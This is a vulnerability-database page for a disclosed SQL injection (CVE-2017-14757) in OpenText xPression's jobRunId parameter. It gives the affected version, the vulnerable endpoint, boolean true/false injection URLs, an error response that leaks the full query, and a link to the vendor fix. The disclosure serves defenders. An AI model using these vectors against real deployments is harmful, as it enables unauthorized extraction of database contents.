Lucene search

Marcin WoloszynEDB-ID:42939

HistoryOct 02, 2017 - 12:00 a.m.

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection

2017-10-0200:00:00

Marcin Woloszyn

www.exploit-db.com

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

55.7%

JSON

Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.

Vector :
--------

True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

Results in the following error in response:

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbsp;</b>

  See nested exception&#x3b; nested exception is&#x3a;
java.lang.RuntimeException&#x3a;
com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
getJobRunsByIds did not succeed because of a database operation
failure.&#x3b;
&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
ORA-00933&#x3a; SQL command not properly ended

An attacker can see whole query and injection point. This can also be
used for error-based data extraction.

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

55.7%

JSON

Related for EDB-ID:42939

OpenText Document Sciences xPression 4.5SP1 Patch 13 - &#039;jobRunId&#039; SQL Injection

Related

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection